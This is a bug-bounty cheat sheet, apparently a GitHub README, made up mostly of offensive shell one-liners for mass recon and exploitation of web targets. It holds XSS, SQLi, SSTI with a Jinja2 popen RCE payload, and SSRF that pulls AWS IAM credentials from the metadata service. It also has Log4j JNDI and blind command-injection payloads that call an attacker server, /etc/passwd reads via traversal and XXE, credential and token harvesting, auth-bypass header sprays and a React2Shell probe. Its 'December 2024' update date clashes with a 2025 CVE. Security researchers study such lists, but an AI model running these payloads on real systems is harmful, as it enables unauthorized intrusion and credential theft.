cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sed 's|https\?://||' | cut -d'/' -f1 | sort -u | anew subdomains_from_js.txt

💀 Extract GraphQL Endpoints from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txt

💀 Extract JWT Tokens from JS Files

cat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txt

💀 Find Webpack Source Maps

cat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txt

💀 Extract Discord Webhooks from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew discord_webhooks.txt

💀 Find Hidden Admin Routes in JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt

💉 XSS Detection

Dalfox Pipeline

cat urls.txt | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | dalfox pipe --silence --skip-bav

Blind XSS with Callback

cat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silent

Airixss Fast Scan

echo target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"

Knoxss API

cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"

DOM XSS Detection

cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document\.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval\(|\.write\()" && echo "--- @ ---"'

Mass XSS with Nuclei DAST

cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50

Reflected Parameter Detection

cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txt

XSS Polyglot Testing

cat urls.txt | gf xss | qsreplace "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcLiCk=alert() )//" | httpx -silent -mr "alert"

🗄️ SQL Injection

SQLMap Mass Scan

cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2

Error-Based Detection

cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -ms "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txt

Time-Based Blind

cat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 | anew time_based.txt

Ghauri Scan

cat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3

UNION Detection

cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200

Boolean-Based Detection

cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txt

NoSQL Injection

cat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt
cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txt

🌐 SSRF & SSTI

SSRF with Interactsh

cat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silent

SSRF Parameter Fuzzing

cat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"

SSTI Detection

cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txt

SSTI Payload Test

cat urls.txt | qsreplace '${7*7}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 7*7 %>' | httpx -silent -mr "49"

Full SSRF Chain

cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silent

SSRF with DNS Rebinding

cat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silent

Jinja2 SSTI

cat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silent

🕷️ Web Crawling

Katana Deep Crawl

katana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txt

Gospider Full Crawl

gospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anew

Hakrawler with Scope

echo https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txt

ParamSpider Discovery

paramspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txt

Waymore Historical URLs

waymore -i target.com -mode U -oU urls.txt

Crawl with Headless Browser

katana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txt

Extract Forms

katana -u https://target.com -f qurl -silent | grep "?" | anew forms.txt

🔑 Parameter Discovery

X8 Hidden Parameters

cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txt

Arjun Discovery

arjun -i urls.txt -oT arjun_params.txt --stable

Custom Param Bruteforce

cat urls.txt | sed 's/$/\?FUZZ=test/' | ffuf -w params.txt:FUZZ -u FUZZ -mc 200,301,302 -ac

Mine Parameters from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -u

Parameter Pollution Test

cat urls.txt | qsreplace 'param=value1&param=value2' | httpx -silent -mc 200

📁 Content Discovery

Ffuf Directory Bruteforce

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100

💀 Recursive Fuzzing - ffuf Deep Scan

# ☠️ Recursive directory bruteforce with depth 3
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -mc 200,301,302,403 -ac -c -t 100 -o ffuf_recursive.json -of json

💀 Feroxbuster Full Recursive Scan

# ☠️ Deep recursive scan with auto-tune and smart filtering
feroxbuster -u https://target.com -w wordlist.txt -d 5 -L 4 --auto-tune -C 404,500 --smart -o ferox_results.txt

💀 Feroxbuster Multi-Target Recursive

# ☠️ Scan multiple targets from file with recursion
cat alive.txt | xargs -I@ feroxbuster -u @ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -d 3 -t 50 --no-state -q -o [email protected]

💀 ffuf + Feroxbuster Pipeline (Extensions + Recursion)

# ☠️ Find directories with ffuf, then deep scan each with feroxbuster
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302 -ac -c -t 100 -o dirs.json -of json && cat dirs.json | jq -r '.results[].url' | xargs -I@ feroxbuster -u @ -w wordlist.txt -x php,asp,aspx,jsp,html,js -d 2 -t 30 -q

💀 Recursive Fuzzing with Extensions Mass Scan

# ☠️ ffuf recursive with multiple extensions + backup files
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2 -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.conf,.config,.zip,.tar.gz -mc 200,301,302,403,500 -ac -t 80 -rate 100 -o recursive_ext.json

💀 Feroxbuster Parallel Recursive Scan

# ☠️ Parallel scan with multiple wordlists and extensions
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx,jsp,bak,old,zip -d 4 -t 100 -L 5 --parallel 10 --dont-extract-links -C 404 -o ferox_parallel.txt

💀 Feroxbuster Silent Recursive + Headers

# ☠️ Stealth recursive scan with custom headers and rate limiting
feroxbuster -u https://target.com -w wordlist.txt -d 3 -t 30 -r -k --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" --rate-limit 50 -C 400,401,403,404,500 -q -o ferox_stealth.txt

💀 Feroxbuster Extract Links + Recursive

# ☠️ Extract links from responses and add to scan queue recursively
feroxbuster -u https://target.com -w wordlist.txt -d 5 --extract-links --collect-words --collect-backups -x php,html,js,json -t 50 -o ferox_extracted.txt

💀 Feroxbuster Resume + Filter by Size

# ☠️ Smart filtering by response size and resumable state
feroxbuster -u https://target.com -w wordlist.txt -d 4 -S 0 -W 1 --filter-status 404,500 --filter-words 20 --filter-lines 5 --resume-from ferox_state.json --state-file ferox_state.json -o ferox_filtered.txt

💀 Feroxbuster API Endpoints Discovery

# ☠️ Recursive API fuzzing with JSON content-type
feroxbuster -u https://target.com/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -d 3 -x json -t 50 -H "Accept: application/json" -H "Content-Type: application/json" --dont-extract-links -m GET,POST -o ferox_api.txt

Git Exposure

cat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txt

Sensitive Files

cat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txt

Backup Files

cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200

API Documentation

cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txt

Source Code Leak

cat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txt

Config Files

cat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txt

Database Files

cat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txt

⚡ Nuclei Scanning

Full Template Scan

nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txt

CVE Scanning

nuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txt

Subdomain Takeover

subfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50

Exposed Panels

nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txt

Misconfigurations

nuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txt

DAST Mode

nuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txt

Custom Tags

nuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txt

Network Scanning

nuclei -l ips.txt -t network/ -c 25 -o network_vulns.txt

🔌 API Security Testing

GraphQL Introspection

cat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"

REST API Enumeration

cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txt

JWT Analysis

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | anew jwts.txt

API Key Leakage

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt

Broken Authentication

# Test endpoints without auth
cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txt

Rate Limiting Test

for i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -c

BOLA/IDOR Testing

cat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txt

💀 API Endpoint Fuzzing with ffuf

# ☠️ Fuzz API endpoints with common paths and methods
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,204,301,302,401,403,405 -ac -c -t 100 -H "Content-Type: application/json" -o api_fuzz.json -of json

💀 API Version Fuzzing

# ☠️ Discover hidden API versions
ffuf -u https://target.com/api/vFUZZ/users -w <(seq 1 20) -mc 200,201,401,403 -ac -c && ffuf -u https://target.com/FUZZ/users -w <(echo -e "api\nv1\nv2\nv3\nv4\napi/v1\napi/v2\napi/v3\napi/internal\napi/private\napi/admin\napi/dev\napi/test\napi/staging\napi/beta") -mc 200,201,401,403 -ac -c

💀 REST API Methods Fuzzing

# ☠️ Test all HTTP methods on API endpoints
cat api_endpoints.txt | while read url; do for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X $method "$url" -H "Content-Type: application/json"); echo "$method $url - $CODE"; done; done | grep -vE " - (404|405)$" | anew api_methods.txt

💀 GraphQL Fuzzing with ffuf

# ☠️ Fuzz GraphQL endpoints for introspection and queries
ffuf -u https://target.com/FUZZ -w <(echo -e "graphql\ngraphiql\nplayground\nconsole\nquery\ngql\nv1/graphql\nv2/graphql\napi/graphql\napi/gql") -mc 200,400 -ac -c -H "Content-Type: application/json" -d '{"query":"{__typename}"}' -X POST -o graphql_endpoints.json

💀 API Parameter Fuzzing

# ☠️ Discover hidden API parameters with arjun + ffuf combo
cat api_endpoints.txt | xargs -I@ -P5 arjun -u @ -m POST -oT arjun_params.txt && cat api_endpoints.txt | xargs -I@ ffuf -u @?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mc 200,201,400,500 -ac -c -t 50 -o param_fuzz.json

💀 API Authentication Bypass Fuzzing

# ☠️ Test auth bypass techniques on protected endpoints
cat api_endpoints.txt | while read url; do curl -s -o /dev/null -w "%{http_code} - $url\n" "$url" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -H "X-Remote-IP: 127.0.0.1" -H "X-Remote-Addr: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1"; done | grep "^200" | anew auth_bypass.txt

💀 OpenAPI/Swagger Fuzzing

# ☠️ Find and extract endpoints from OpenAPI specs
ffuf -u https://target.com/FUZZ -w <(echo -e "swagger.json\nswagger.yaml\nopenapi.json\nopenapi.yaml\napi-docs\napi-docs.json\nswagger-ui.html\nswagger/v1/swagger.json\nv1/swagger.json\nv2/swagger.json\nv3/swagger.json\napi/swagger.json\ndocs/api\napi/docs") -mc 200 -ac -c | tee swagger_found.txt | xargs -I@ curl -s @ | jq -r '.paths | keys[]' 2>/dev/null | anew swagger_paths.txt

💀 API JSON Fuzzing with Nuclei

# ☠️ Mass API fuzzing with nuclei DAST mode
cat api_endpoints.txt | httpx -silent -mc 200,201,401,403 | nuclei -dast -t dast/vulnerabilities/ -H "Content-Type: application/json" -rl 20 -c 5 -o api_nuclei_dast.txt

💀 API Mass Assignment Fuzzing

# ☠️ Test for mass assignment vulnerabilities
cat api_endpoints.txt | grep -iE "(user|account|profile|register|signup|update)" | xargs -I@ curl -s -X POST @ -H "Content-Type: application/json" -d '{"admin":true,"role":"admin","isAdmin":true,"is_admin":1,"privilege":"admin","access_level":9999}' -o /dev/null -w "%{http_code} - @\n" | grep -E "^(200|201|204)" | anew mass_assignment.txt

💀 API FUZZ with Custom Wordlist Generation

# ☠️ Generate API wordlist from JS files and fuzz
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\']/(api|v[0-9])/[a-zA-Z0-9/_-]+[\"\']" | tr -d "\"'" | sort -u > custom_api_wordlist.txt && ffuf -u https://target.com/FUZZ -w custom_api_wordlist.txt -mc 200,201,204,401,403,500 -ac -c -t 80 -H "Authorization: Bearer null" -o custom_api_fuzz.json

☁️ Cloud Security

AWS S3 Bucket Finder

cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt

S3 Permission Check

cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'

Firebase Database

cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"

Azure Blob Storage

cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txt

GCP Storage

cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt

AWS Metadata SSRF

cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"

Cloud Credential Files

cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt

🤖 Automation Scripts

Full Recon Pipeline

#!/bin/bash
domain=$1
mkdir -p $domain && cd $domain

# Subdomains
subfinder -d $domain -all -silent | anew subs.txt
amass enum -passive -d $domain | anew subs.txt
assetfinder -subs-only $domain | anew subs.txt

# Alive check
cat subs.txt | httpx -silent -threads 100 | anew alive.txt

# URLs
cat alive.txt | katana -d 5 -jc -silent | anew urls.txt
cat alive.txt | waybackurls | anew urls.txt
cat alive.txt | gau --threads 50 | anew urls.txt

# Vulnerability patterns
cat urls.txt | gf xss | anew xss.txt
cat urls.txt | gf sqli | anew sqli.txt
cat urls.txt | gf ssrf | anew ssrf.txt
cat urls.txt | gf lfi | anew lfi.txt

# Nuclei scan
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt

XSS Hunter Script

#!/bin/bash
target=$1
echo $target | waybackurls | anew urls.txt
echo $target | gau | anew urls.txt
cat urls.txt | gf xss | uro | qsreplace '"><img src=x onerror=alert(1)>' | airixss -payload "alert(1)" | tee xss_found.txt
cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt

API Recon Script

#!/bin/bash
target=$1
mkdir -p $target/api && cd $target/api

# Find API endpoints
cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt

# Extract from JS
cat ../js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+)" | sort -u | anew js_api_endpoints.txt

# Test GraphQL
cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt

echo "[+] API recon complete!"

⚙️ Bash Functions

Add to your .bashrc or .zshrc:

# Quick recon
recon() {
    subfinder -d $1 -silent | anew subs.txt
    assetfinder -subs-only $1 | anew subs.txt
    cat subs.txt | httpx -silent | anew alive.txt
    echo "[+] Found $(wc -l < alive.txt) alive hosts"
}

# XSS scan
xscan() {
    echo $1 | waybackurls | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
}

# SQLi scan
sqscan() {
    echo $1 | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -ms "error|syntax|mysql"
}

# JS recon
jsrecon() {
    echo $1 | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/
}

# Nuclei quick
nuke() {
    echo $1 | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
}

# Full pipeline
fullrecon() {
    recon $1
    cat alive.txt | katana -d 3 -jc -silent | anew urls.txt
    cat urls.txt | gf xss | anew xss.txt
    cat urls.txt | gf sqli | anew sqli.txt
    nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
}

# Certificate search
cert() {
    curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}

# Parameter extraction
params() {
    echo $1 | waybackurls | grep "=" | uro | unfurl keys | sort -u
}

# Subdomain takeover check
takeover() {
    subfinder -d $1 -silent | httpx -silent | nuclei -t takeovers/ -c 50
}

# Port scan
portscan() {
    naabu -host $1 -top-ports 1000 -silent | httpx -silent | anew $1_ports.txt
}

# Screenshot all
screenshot() {
    cat $1 | xargs -I@ gowitness single @ -o screenshots/
}

🆕 New Oneliners 2024-2025

⚡🔥⚡ React2Shell - CVE-2025-55182 (CVSS 10.0 - CRITICAL) ⚡🔥⚡

💀 Critical RCE in React Server Components & Next.js - Under active exploitation! Added to CISA KEV 💀

⚡ Detect Next.js Apps (Recon First)

cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txt

⚡ Check if Next-Action Header is Accepted

curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'

⚡ Mass Detection - Next-Action Header Accepted

cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt

⚡ Create Payload Files for Testing

# Create payload.json (safe math check - no RCE)
echo '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"7*7","_formData":{"get":"$1:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txt

⚡ Manual Vulnerability Check with cURL

curl -X POST https://target.com -H "Next-Action: check" -F "[email protected]" -F "[email protected]" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"

⚡ One-liner: Full Detection Pipeline

subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txt

⚡ Detect Vulnerable Response Headers

cat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'

⚡ Mass Scan with httpx + Next-Action Probe

cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txt

⚡ Shodan Dork for Next.js Targets

shodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txt

⚡ Nuclei Template Check

nuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txt

⚡ Find & Test - Complete One-liner

subfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txt

⚡ Check RSC Endpoint Directly

curl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500

⚡ Batch Test from File with Parallel

cat urls.txt | parallel -j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt

⚠️ Affected: React 19.0.0-19.2.0, Next.js 15.0.4-16.0.6 | ✅ Fix: Update to React 19.0.1/19.1.2/19.2.1

🎯 Key Detection: Apps accepting Next-Action header + RSC deserialization = Potential RCE

Nuclei DAST XSS

echo "https://target.com" | nuclei -dast -t dast/vulnerabilities/xss/ -rl 5

Open Redirect Mass

cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -silent -location | grep "evil.com"

CORS Misconfiguration

cat urls.txt | httpx -silent -H "Origin: https://evil.com" -match-string "evil.com" | anew cors_vuln.txt

Host Header Injection

cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -match-string "evil.com"

CRLF Injection

cat urls.txt | qsreplace "%0d%0aX-Injected: header" | httpx -silent -match-string "X-Injected"

Prototype Pollution

cat js.txt | xargs -I@ curl -s @ | grep -E "(__proto__|constructor\.prototype)" | anew proto_pollution.txt

Cache Poisoning Detection

cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -H "X-Original-URL: /admin" -mc 200

IDOR Pattern Detection

cat urls.txt | grep -oE "(id|user|account|uid|pid)=[0-9]+" | sort -u | anew idor_candidates.txt

Race Condition URLs

cat urls.txt | grep -iE "(redeem|coupon|vote|like|follow|transfer|withdraw)" | anew race_condition.txt

WebSocket Endpoints

cat urls.txt | grep -iE "(socket|ws://|wss://)" | anew websocket.txt

Path Traversal

cat urls.txt | gf lfi | qsreplace "....//....//....//etc/passwd" | httpx -silent -match-string "root:x"

XXE Detection

cat urls.txt | grep -iE "\.(xml|soap)" | qsreplace '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'

Log4j Scan

cat urls.txt | qsreplace '${jndi:ldap://YOURSERVER/a}' | httpx -silent -H 'X-Api-Version: ${jndi:ldap://YOURSERVER/a}'

Blind Command Injection

cat urls.txt | qsreplace "\`curl YOURSERVER\`" | httpx -silent
cat urls.txt | qsreplace "| curl YOURSERVER" | httpx -silent

Mass Screenshot

cat alive.txt | xargs -I@ gowitness single @ -o screenshots/

Technology Detection

cat alive.txt | httpx -silent -tech-detect -status-code -title | anew tech_stack.txt

Favicon Hash (Shodan)

curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}'

Exposed Admin Panels

cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt

Debug Endpoints

cat alive.txt | httpx -silent -path /debug,/trace,/actuator,/metrics,/health,/info -mc 200 | anew debug_endpoints.txt

Spring Boot Actuators

cat alive.txt | httpx -silent -path /actuator/env,/actuator/heapdump,/actuator/mappings -mc 200 | anew spring_actuators.txt

WordPress Enumeration

cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 | anew wp_users.txt

Laravel Debug Mode

cat alive.txt | httpx -silent -match-string "Whoops" -match-string "Laravel" | anew laravel_debug.txt

Django Debug

cat alive.txt | httpx -silent -match-string "Django" -match-string "DEBUG" | anew django_debug.txt

HTTP Request Smuggling

cat alive.txt | python3 smuggler.py -q 2>/dev/null | anew smuggling.txt

CSP Bypass Check

cat alive.txt | httpx -silent -include-response-header | grep -i "content-security-policy" | anew csp_headers.txt

Subdomain from Favicon

curl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"

🔍 Search Engines for Hackers

Engine	Link	Description
Shodan	shodan.io	IoT & device search
Censys	censys.io	Internet scan data
Fofa	fofa.info	Cyberspace search
ZoomEye	zoomeye.org	Cyberspace mapping
Hunter	hunter.how	Asset discovery
Netlas	netlas.io	Attack surface
GreyNoise	greynoise.io	Internet scanners
Onyphe	onyphe.io	Cyber defense
CriminalIP	criminalip.io	Threat intel
FullHunt	fullhunt.io	Attack surface
Quake	quake.360.net	Cyberspace search
Leakix	leakix.net	Leak detection
URLScan	urlscan.io	URL analysis
DNSDumpster	dnsdumpster.com	DNS recon
crt.sh	crt.sh	Certificate search
SecurityTrails	securitytrails.com	DNS history
Pulsedive	pulsedive.com	Threat intel
VirusTotal	virustotal.com	File/URL analysis
PublicWWW	publicwww.com	Source code search
Grep.app	grep.app	GitHub code search

📖 Recommended Wordlists

Wordlist	Link	Use Case
SecLists	GitHub	Everything
FuzzDB	GitHub	Fuzzing
Assetnote	wordlists.assetnote.io	Web content
OneListForAll	GitHub	Combined
jhaddix all.txt	GitHub	Directories
commonspeak2	GitHub	Real-world

📚 Learning Resources

Books

Web Application Hacker's Handbook
Real-World Bug Hunting by Peter Yaworski
Bug Bounty Bootcamp by Vickie Li

Platforms

Practice

Blogs & Resources

🙏 Special Thanks

Hunter	Hunter	Hunter
@bt0s3c	@MrCl0wnLab	@stokfredrik
@Jhaddix	@TomNomNom	@NahamSec
@zseano	@pry0cc	@pdiscoveryio
@jeff_foley	@haaborern	@0xacb

📊 Repository Stats

⭐ Star History

⚠️ Disclaimer

For authorized security testing only. Always obtain proper authorization before testing.

The author is not responsible for any misuse of this information.

Last Updated: December 2024

Name		Name	Last commit message	Last commit date
Latest commit History 309 Commits
DoD Domains.txt		DoD Domains.txt
DoD crawl.py		DoD crawl.py
OFJAAAH-cpanelXSS.yaml		OFJAAAH-cpanelXSS.yaml
Readme.md		Readme.md
SSRF		SSRF
bot.py		bot.py
bot.txt		bot.txt
bottest.py		bottest.py
docker2.yaml		docker2.yaml
downlink		downlink
graphql-OFJAAAH.yaml		graphql-OFJAAAH.yaml
resolvhtml.go		resolvhtml.go
swagger.json		swagger.json
swagger.yaml		swagger.yaml

KingOfBugbounty/KingOfBugBountyTips

Folders and files

Latest commit

History

Repository files navigation